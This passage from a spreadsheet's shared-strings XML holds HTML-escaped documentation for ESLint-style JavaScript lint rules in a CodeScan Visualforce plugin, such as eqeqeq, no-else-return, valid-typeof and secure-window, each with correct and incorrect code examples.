id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="http://ejohn.org/blog/objectgetprototypeof/"&gt;Object.getPrototypeOf&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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block.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function foo() {\n    if (x) {\n        return y;\n    } else {\n        return z;\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This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statement.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="json language-json"&gt;{\n    "no-else-return": ["error", { "allowElseIf": true }],\n    // or\n    "no-else-return": ["error", { "allowElseIf": false }]\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;allowElseIf: true&lt;/code&gt; (default) allows &lt;code&gt;else if&lt;/code&gt; blocks after a return&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;allowElseIf: false&lt;/code&gt; disallows &lt;code&gt;else if&lt;/code&gt; blocks after a return&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="allowelseiftrue"&gt;&lt;code&gt;allowElseIf: true&lt;/code&gt;&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: "error"*/\n\nfunction foo() {\n    if (x) {\n        return y;\n    } else {\n        return z;\n    }\n}\n\nfunction foo() {\n    if (x) {\n        return y;\n    } else if (z) {\n        return w;\n    } else {\n        return t;\n    }\n}\n\nfunction foo() {\n    if (x) {\n        return y;\n    } else {\n        var t = "foo";\n    }\n\n    return t;\n}\n\nfunction foo() {\n    if (error) {\n        return 'It failed';\n    } else {\n        if (loading) {\n            return "It's still loading";\n        }\n    }\n}\n\n// Two warnings for nested occurrences\nfunction foo() {\n    if (x) {\n        if (y) {\n            return y;\n        } else {\n            return x;\n        }\n    } else {\n        return z;\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: "error"*/\n\nfunction foo() {\n    if (x) {\n        return y;\n    }\n\n    return z;\n}\n\nfunction foo() {\n    if (x) {\n        return y;\n    } else if (z) {\n        var t = "foo";\n    } else {\n        return w;\n    }\n}\n\nfunction foo() {\n    if (x) {\n        if (z) {\n            return y;\n        }\n    } else {\n        return z;\n    }\n}\n\nfunction foo() {\n    if (error) {\n        return 'It failed';\n    } else if (loading) {\n        return "It's still loading";\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowelseiffalse"&gt;&lt;code&gt;allowElseIf: false&lt;/code&gt;&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: ["error", {allowElseIf: false}]*/\n\nfunction foo() {\n    if (error) {\n        return 'It failed';\n    } else if (loading) {\n        return "It's still loading";\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: ["error", {allowElseIf: false}]*/\n\nfunction foo() {\n    if (error) {\n        return 'It failed';\n    }\n\n    if (loading) {\n        return "It's still loading";\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-label-var</t>
  </si>
  <si>
    <t>disallow labels that share a name with a variable</t>
  </si>
  <si>
    <t>&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule aims to create clearer code by disallowing the bad practice of creating a label that shares a name with a variable that is in scope.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-label-var: "error"*/\n\nvar x = foo;\nfunction bar() {\nx:\n  for (;;) {\n    break x;\n  }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-label-var: "error"*/\n\n// The variable that has the same name as the label is not in scope.\n\nfunction foo() {\n  var q = t;\n}\n\nfunction bar() {\nq:\n  for(;;) {\n    break q;\n  }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you don't want to be notified about usage of labels, then it's safe to disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-empty-character-class</t>
  </si>
  <si>
    <t>disallow empty character classes in regular expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Because empty character classes in regular expressions do not match anything, they might be typing mistakes.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var foo = /^abc[]/;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows empty character classes in regular expressions.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-empty-character-class: "error"*/\n\n/^abc[]/.test("abcdefg"); // false\n"abcdefg".match(/^abc[]/); // null\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-empty-character-class: "error"*/\n\n/^abc/.test("abcdefg"); // true\n"abcdefg".match(/^abc/); // ["abc"]\n\n/^abc[a-z]/.test("abcdefg"); // true\n"abcdefg".match(/^abc[a-z]/); // ["abcd"]\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="knownlimitations"&gt;Known Limitations&lt;/h2&gt;\n&lt;p&gt;This rule does not report empty character classes in the string argument of calls to the &lt;code&gt;RegExp&lt;/code&gt; constructor.&lt;/p&gt;\n&lt;p&gt;Example of a &lt;em&gt;false negative&lt;/em&gt; when this rule reports correct code:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-empty-character-class: "error"*/\n\nvar abcNeverMatches = new RegExp("^abc[]");\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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work:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;Foo.prototype.__iterator__ = function() {\n    return new FooIterator(this);\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;You should use ECMAScript 6 iterators and generators instead.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at preventing errors that may arise from using the &lt;code&gt;__iterator__&lt;/code&gt; property, which is not implemented in several browsers. As such, it will warn whenever it encounters the &lt;code&gt;__iterator__&lt;/code&gt; property.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-iterator: "error"*/\n\nFoo.prototype.__iterator__ = function() {\n    return new FooIterator(this);\n};\n\nfoo.__iterator__ = function () {};\n\nfoo["__iterator__"] = function () {};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-iterator: "error"*/\n\nvar __iterator__ = foo; // Not using the `__iterator__` property.\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Iterators_and_Generators"&gt;MDN - Iterators and Generators&lt;/a&gt;&lt;/li&gt;\n&lt;li&gt;&lt;a href="https://kangax.github.io/es5-compat-table/es6/#Iterators"&gt;ECMAScript 6 compatibility table - Iterators&lt;/a&gt;&lt;/li&gt;\n&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Deprecated_and_obsolete_features#Object_methods"&gt;Deprecated and Obsolete Features&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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value.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;if (foo == null) {\n  bar();\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;The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&lt;code&gt;!=&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-eq-null: "error"*/\n\nif (foo == null) {\n  bar();\n}\n\nwhile (qux != null) {\n  baz();\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-eq-null: "error"*/\n\nif (foo === null) {\n  bar();\n}\n\nwhile (qux !== null) {\n  baz();\n}\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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literals.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule enforces comparing &lt;code&gt;typeof&lt;/code&gt; expressions to valid string literals.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"requireStringLiterals": true&lt;/code&gt; requires &lt;code&gt;typeof&lt;/code&gt; expressions to only be compared to string literals or other &lt;code&gt;typeof&lt;/code&gt; expressions, and disallows comparisons to any other value.&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint valid-typeof: "error"*/\n\ntypeof foo === "strnig"\ntypeof foo == "undefimed"\ntypeof bar != "nunber"\ntypeof bar !== "function"\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint valid-typeof: "error"*/\n\ntypeof foo === "string"\ntypeof bar == "undefined"\ntypeof foo === baz\ntypeof bar === typeof qux\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code with the &lt;code&gt;{ "requireStringLiterals": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;typeof foo === undefined\ntypeof bar == Object\ntypeof baz === "strnig"\ntypeof qux === "some invalid type"\ntypeof baz === anotherVariable\ntypeof foo == 5\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code with the &lt;code&gt;{ "requireStringLiterals": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;typeof foo === "undefined"\ntypeof bar == "object"\ntypeof baz === "string"\ntypeof bar === typeof qux\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;You may want to turn this rule off if you will be using the &lt;code&gt;typeof&lt;/code&gt; operator on host objects.&lt;/p&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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equivalent:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;if (!!foo) {\n    // ...\n}\n\nif (Boolean(foo)) {\n    // ...\n}\n\nif (foo) {\n    // ...\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows unnecessary boolean casts.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-boolean-cast: "error"*/\n\nvar foo = !!!bar;\n\nvar foo = !!bar ? baz : bat;\n\nvar foo = Boolean(!!bar);\n\nvar foo = new Boolean(!!bar);\n\nif (!!foo) {\n    // ...\n}\n\nif (Boolean(foo)) {\n    // ...\n}\n\nwhile (!!foo) {\n    // ...\n}\n\ndo {\n    // ...\n} while (Boolean(foo));\n\nfor (; !!foo; ) {\n    // ...\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-boolean-cast: "error"*/\n\nvar foo = !!bar;\nvar foo = Boolean(bar);\n\nfunction foo() {\n    return !!bar;\n}\n\nvar foo = bar ? !!baz : !!bat;\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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parameter.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var err = "x";\n\ntry {\n    throw "problem";\n} catch (err) {\n\n}\n\nconsole.log(err)    // err is 'problem', not 'x'\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This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scope.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-catch-shadow: "error"*/\n\nvar err = "x";\n\ntry {\n    throw "problem";\n} catch (err) {\n\n}\n\nfunction err() {\n    // ...\n};\n\ntry {\n    throw "problem";\n} catch (err) {\n\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-catch-shadow: "error"*/\n\nvar err = "x";\n\ntry {\n    throw "problem";\n} catch (e) {\n\n}\n\nfunction err() {\n    // ...\n};\n\ntry {\n    throw "problem";\n} catch (e) {\n\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you do not need to support IE 8 and earlier, you should turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:unknown</t>
  </si>
  <si>
    <t>CodeScan Other Rules</t>
  </si>
  <si>
    <t>&lt;p&gt;This is reserved for future rules and expansion of the plugin. Do not turn this off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:secure-window</t>
  </si>
  <si>
    <t>validate window global access</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that only supported properties and functions are used to access the window global.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Standard Lightning Component Framework features.&lt;/li&gt;\n&lt;li&gt;Standard Javascript features.&lt;/li&gt;\n&lt;li&gt;Standard Locker Service SecureObject object features. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;All disallowed uses are shown in red on this &lt;a href="http://documentation.auraframework.org/lockerApiTest/index.app?aura.mode=DEV"&gt;Window vs SecureWindow Compatibility Table&lt;/a&gt;.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;window.top;  //The use of window.top is disallowed.\nwindow.setImmediate(); //The use of window.setImmediate() is disallowed.\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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executed.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows invalid regular expression strings in &lt;code&gt;RegExp&lt;/code&gt; constructors.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-invalid-regexp: "error"*/\n\nRegExp('[')\n\nRegExp('.', 'z')\n\nnew RegExp('\\')\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-invalid-regexp: "error"*/\n\nRegExp('.')\n\nnew RegExp\n\nthis.RegExp('[')\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="environments"&gt;Environments&lt;/h2&gt;\n&lt;p&gt;ECMAScript 6 adds the following flag arguments to the &lt;code&gt;RegExp&lt;/code&gt; constructor:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"u"&lt;/code&gt; (&lt;a href="https://people.mozilla.org/~jorendorff/es6-draft.html#sec-get-regexp.prototype.unicode"&gt;unicode&lt;/a&gt;)&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"y"&lt;/code&gt; (&lt;a href="https://people.mozilla.org/~jorendorff/es6-draft.html#sec-get-regexp.prototype.sticky"&gt;sticky&lt;/a&gt;)&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;You can enable these to be recognized as valid by setting the ECMAScript version to 6 in your &lt;a href="../user-guide/configuring"&gt;ESLint configuration&lt;/a&gt;.&lt;/p&gt;\n&lt;p&gt;If you want to allow additional constructor flags for any reason, you can specify them using an &lt;code&gt;allowConstructorFlags&lt;/code&gt; option in &lt;code&gt;.eslintrc&lt;/code&gt;. These flags will then be ignored by the rule regardless of the &lt;code&gt;ecmaVersion&lt;/code&gt; setting.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"allowConstructorFlags"&lt;/code&gt; is an array of flags&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="allowconstructorflags"&gt;allowConstructorFlags&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowConstructorFlags": ["u", "y"] }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-invalid-regexp: ["error", { "allowConstructorFlags": ["u", "y"] }]*/\n\nnew RegExp('.', 'y')\n\nnew RegExp('.', 'yu')\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;A list of valid flags for regular expressions is available &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp"&gt;here&lt;/a&gt;.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://es5.github.io/#x7.8.5"&gt;Annotated ES5 §7.8.5 - Regular Expression Literals&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-shadow-restricted-names</t>
  </si>
  <si>
    <t>disallow identifiers from shadowing restricted names</t>
  </si>
  <si>
    <t>&lt;p&gt;ES5 §15.1.1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writing:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var undefined = "foo";\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Then any code used within the same scope would not get the global &lt;code&gt;undefined&lt;/code&gt;, but rather the local version with a very different meaning.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-shadow-restricted-names: "error"*/\n\nfunction NaN(){}\n\n!function(Infinity){};\n\nvar undefined;\n\ntry {} catch(eval){}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-shadow-restricted-names: "error"*/\n\nvar Object;\n\nfunction f(a, b){}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://es5.github.io/#x15.1.1"&gt;Annotated ES5 - §15.1.1&lt;/a&gt;&lt;/li&gt;\n&lt;li&gt;&lt;a href="https://es5.github.io/#C"&gt;Annotated ES5 - Annex C&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:eqeqeq</t>
  </si>
  <si>
    <t>require the use of `===` and `!==`</t>
  </si>
  <si>
    <t>&lt;p&gt;It is considered good practice to use the type-safe equality operators &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; instead of their regular counterparts &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;The reason for this is that &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt; do type coercion which follows the rather obscure &lt;a href="https://www.ecma-international.org/ecma-262/5.1/#sec-11.9.3"&gt;Abstract Equality Comparison Algorithm&lt;/a&gt;.\nFor instance, the following statements are all considered &lt;code&gt;true&lt;/code&gt;:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;[] == false&lt;/code&gt;&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;[] == ![]&lt;/code&gt;&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;3 == "03"&lt;/code&gt;&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;If one of those occurs in an innocent-looking statement such as &lt;code&gt;a == b&lt;/code&gt; the actual problem is very difficult to spot.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at eliminating the type-unsafe equality operators.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: "error"*/\n\nif (x == 42) { }\n\nif ("" == text) { }\n\nif (obj.getStuff() != undefined) { }\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;The &lt;code&gt;--fix&lt;/code&gt; option on the command line automatically fixes some problems reported by this rule. A problem is only fixed if one of the operands is a &lt;code&gt;typeof&lt;/code&gt; expression, or if both operands are literals with the same type.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;h3 id="always"&gt;always&lt;/h3&gt;\n&lt;p&gt;The &lt;code&gt;"always"&lt;/code&gt; option (default) enforces the use of &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; in every situation (except when you opt-in to more specific handling of &lt;code&gt;null&lt;/code&gt; [see below]).&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "always"]*/\n\na == b\nfoo == true\nbananas != 1\nvalue == undefined\ntypeof foo == 'undefined'\n'hello' != 'world'\n0 == 0\ntrue == true\nfoo == null\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "always"]*/\n\na === b\nfoo === true\nbananas !== 1\nvalue === undefined\ntypeof foo === 'undefined'\n'hello' !== 'world'\n0 === 0\ntrue === true\nfoo === null\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;This rule optionally takes a second argument, which should be an object with the following supported properties:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"null"&lt;/code&gt;: Customize how this rule treats &lt;code&gt;null&lt;/code&gt; literals. Possible values:&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;always&lt;/code&gt; (default) - Always use === or !==.&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;never&lt;/code&gt; - Never use === or !== with &lt;code&gt;null&lt;/code&gt;.&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;ignore&lt;/code&gt; - Do not apply this rule to &lt;code&gt;null&lt;/code&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="smart"&gt;smart&lt;/h3&gt;\n&lt;p&gt;The &lt;code&gt;"smart"&lt;/code&gt; option enforces the use of &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; except for these cases:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Comparing two literal values&lt;/li&gt;\n&lt;li&gt;Evaluating the value of &lt;code&gt;typeof&lt;/code&gt;&lt;/li&gt;\n&lt;li&gt;Comparing against &lt;code&gt;null&lt;/code&gt;&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"smart"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "smart"]*/\n\n// comparing two variables requires ===\na == b\n\n// only one side is a literal\nfoo == true\nbananas != 1\n\n// comparing to undefined requires ===\nvalue == undefined\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"smart"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint eqeqeq: ["error", "smart"]*/\n\ntypeof foo == 'undefined'\n'hello' != 'world'\n0 == 0\ntrue == true\nfoo == null\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allownull"&gt;allow-null&lt;/h3&gt;\n&lt;p&gt;&lt;strong&gt;Deprecated:&lt;/strong&gt; Instead of using this option use "always" and pass a "null" option property with value "ignore". This will tell ESLint to always enforce strict equality except when comparing with the &lt;code&gt;null&lt;/code&gt; literal.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;["error", "always", {"null": "ignore"}]\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you don't want to enforce a style for using equality operators, then it's safe to disable this rule.&lt;/p&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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initializer).&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;Any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HTML).&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-undef: "error"*/\n\nvar a = someFunction();\nb = 10;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with &lt;code&gt;global&lt;/code&gt; declaration:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*global someFunction b:true*/\n/*eslint no-undef: "error"*/\n\nvar a = someFunction();\nb = 10;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;The &lt;code&gt;b:true&lt;/code&gt; syntax in &lt;code&gt;/*global */&lt;/code&gt; indicates that assignment to &lt;code&gt;b&lt;/code&gt; is correct.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with &lt;code&gt;global&lt;/code&gt; declaration:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*global b*/\n/*eslint no-undef: "error"*/\n\nb = 10;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;By default, variables declared in &lt;code&gt;/*global */&lt;/code&gt; are read-only, therefore assignment is incorrect.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;typeof&lt;/code&gt; set to true will warn for variables used inside typeof check (Default false).&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 